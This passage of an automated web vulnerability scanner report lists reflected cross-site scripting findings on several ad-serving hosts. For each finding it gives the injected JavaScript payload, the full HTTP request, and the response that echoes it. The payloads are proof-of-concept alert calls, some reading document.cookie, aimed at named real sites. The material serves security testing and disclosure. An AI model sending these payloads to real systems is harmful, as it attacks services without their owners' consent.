P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=122
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:12 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='5ff81";alert(1)//ead3d160fc3';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5ff81";alert(1)//ead3d160fc3;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;

var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.15. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 358a8"%3balert(1)//aa5cf3e9e9f was submitted in the q parameter. This input was echoed as 358a8";alert(1)//aa5cf3e9e9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=358a8"%3balert(1)//aa5cf3e9e9f&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:55 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#778908|0,1,1;expires=Thu, 02 Jun 2011 15:40:55 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=ByLATcGt89aI5vwvuTkcIrQs~050311;expires=Fri, 30 Apr 2021 15:40:55 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:55 GMT
Connection: close
Content-Length: 2284

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='358a8";alert(1)//aa5cf3e9e9f';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=358a8";alert(1)//aa5cf3e9e9f;z="+Math.random();}

var zzhasAd=undefined;

var zzStr = "s=1;u=unknown;z=" + Math.random();
var
...[SNIP]...

6.16. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49922"%3balert(1)//84fc01aee65 was submitted in the $ parameter. This input was echoed as 49922";alert(1)//84fc01aee65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=49922"%3balert(1)//84fc01aee65&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:49922";alert(1)//84fc01aee65;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bj@yEPgqr2WWJl~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',49922";alert(1)//84fc01aee65';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,49922";alert(1)//84fc01aee65;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;

var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.17. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2748'%3balert(1)//d2806d13839 was submitted in the $ parameter. This input was echoed as b2748';alert(1)//d2806d13839 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b2748'%3balert(1)//d2806d13839&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b2748';alert(1)//d2806d13839;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89bC2qMYwYFFL0X3~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2889

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b2748';alert(1)//d2806d13839';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b2748';alert(1)//d2806d13839;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;

...[SNIP]...

6.18. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d68c6'%3balert(1)//1b7b6b54f66 was submitted in the q parameter. This input was echoed as d68c6';alert(1)//1b7b6b54f66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d68c6'%3balert(1)//1b7b6b54f66&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89amjI50-w4PEU7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d68c6';alert(1)//1b7b6b54f66';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d68c6';alert(1)//1b7b6b54f66;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;

...[SNIP]...

6.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [q parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-405/d3/jsc/fmr.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d87ee"%3balert(1)//8b6d12f37ea was submitted in the q parameter. This input was echoed as d87ee";alert(1)//8b6d12f37ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1&a=0&f=&n=1190&r=5&d=9&q=d87ee"%3balert(1)//8b6d12f37ea&$=&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:53 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:53 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BSLATcGt89YzHY4DG2oMe7A6~050311;expires=Fri, 30 Apr 2021 15:40:53 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=141
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:53 GMT
Connection: close
Content-Length: 2886

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='d87ee";alert(1)//8b6d12f37ea';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=d87ee";alert(1)//8b6d12f37ea;z="+Math.random();}

if(zzuid=='unknown')zzuid='unknown';

var zzhasAd=undefined;

var zzStr = "s=1;u=unknown;z=" + Math.random();
var ainf
...[SNIP]...

6.20. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8925c'%3balert(1)//d2520030bec was submitted in the redir parameter. This input was echoed as 8925c';alert(1)//d2520030bec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-77237941_1304437410,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-77237941_1304437410%2C11fda490648f83c%2CMiscellaneous%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D975335%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D0.3433780161396228%3F8925c'%3balert(1)//d2520030bec HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: uuid2=4712109102545615229; icu=ChII3pUBEAoYBiAGKAYw27_K6gQQ27_K6gQYBQ..; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`OawuG(Le#W21[=q; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 04-May-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII7IABEAoYASABKAEwiMaA7gQQiMaA7gQYAA..; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb91751=5_[r^208WM*c3rB20/dR9rOOE?enc=KVyPwvUoDEDy0k1iEFgJQAAAAKCZmQlA8tJNYhBYCUApXI_C9SgMQFhEijVWrHZufbkdUEPGZEEHI8BNAAAAACk9AwA3AQAAZAAAAAIAAAAGEgUABF8AAAEAAABVU0QAVVNEACwB-gAtHgAANAcBAgUCAAUAAAAAxxvheAAAAAA.&tt_code=cm.rev_lee&udj=uf%28%27a%27%2C+27%2C+1304437511%29%3Buf%28%27g%27%2C+1079%2C+1304437511%29%3Buf%28%27r%27%2C+332294%2C+1304437511%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2811%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2882%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2884%2C+%277959738877689349208%27%2C+1304437511%2C+1314805511%2C+66646%2C+24324%29%3Bppv%2887%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28619%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28620%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3Bppv%28621%2C+%277959738877689349208%27%2C+1304437511%2C+1304523911%2C+66646%2C+24324%29%3B&cnd=!jBesJgjWiAQQhqQUGAAghL4BKAAxmpmZyfUoDEBCEwgAEAAYACABKP7__________wFCCghSEAAYACADKAFCCghUEAAYACADKAFIAVAAWK08YABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66646; path=/; expires=Wed, 04-May-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4712109102545615229; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FSmx=5E%IV!kszdkNSo6@-y`/AGF4HtVmG.cyIxd`r.W; path=/; expires=Mon, 01-Aug-2011 15:45:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 03 May 2011 15:45:12 GMT
Content-Length: 527

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_lee/;net=cm;u=,cm-77237941_1304437410,11fda490648f83c,Miscellaneous,ax.300;;cmw=owl;sz=300x250;net=cm;ord1=975335;contx=Miscellaneous;an=300;dc=w;btg=;ord=0.3433780161396228?8925c';alert(1)//d2520030bec">
...[SNIP]...

6.21. http://k.collective-media.net/cmadj/cm.rev_lee/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee38'-alert(1)-'19ab35be67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.rev_leedee38'-alert(1)-'19ab35be67/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:32 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:32 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:32 GMT
Content-Length: 8159

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64518349_1304437412","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_leedee38'-alert(1)-'19ab35be67&size=300x250&imp_id=cm-64518349_1304437412,11fda490648f83c&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad
...[SNIP]...

6.22. http://k.collective-media.net/cmadj/cm.rev_lee/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8487b'-alert(1)-'4ebfefb46d0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.rev_lee/;sz=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA= HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT-1; cli=11fda490648f83c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:31 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:31 GMT
Content-Length: 8077

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-41783944_1304437411","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=8487b'-alert(1)-'4ebfefb46d0&01RI=0B3057BAC5C6A5A&01NA=&imp_id=cm-41783944_1304437411,11fda490648f83c&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-41783944_1304437411%2C11fda490648f
...[SNIP]...

6.23. http://servedby.flashtalking.com/imp/3/15881 [124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac2fb"-alert(1)-"a54c5de421a was submitted in the 124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /imp/3/15881;124094;201;js;SpecificMedia;Target5DemoA3564ClevelandDMABT300x250/?click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509 HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:42:36 GMT
Server: Jetty(6.1.22)
Set-Cookie: flashtalkingad1="GUID=12187B0AA1E5A3";Path=/;Domain=flashtalking.com;Expires=Thu, 02-May-13 15:42:36 GMT
Content-Length: 565
Cache-Control: no-cache, no-store
content-type: text/javascript
pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Via: 1.1 dfw175171010000 (MII-APC/1.6)

var ftGUID_124094="12187B0AA1E5A3";
var ftConfID_124094="0";
var ftParams_124094="click=http://ads.specificmedia.com/click/v=5;m=2;l=8610;c=143917;b=856866;ts=20110503114211;dct=ac2fb"-alert(1)-"a54c5de421a&ftx=&fty=&ftadz=&ftscw=&cachebuster=866904.4431923509";
var ftKeyword_124094="";
var ftSegment_124094="";
var ftSegmentList_124094=[];
var ftRuleMatch_124094="0";

document.write('<scr'+'ipt src=
...[SNIP]...

6.24. http://servedby.flashtalking.com/imp/3/15881 [cachebuster parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/imp/3/15881

Issue detail

The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dca13"-alert(1)-"121437d18da was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

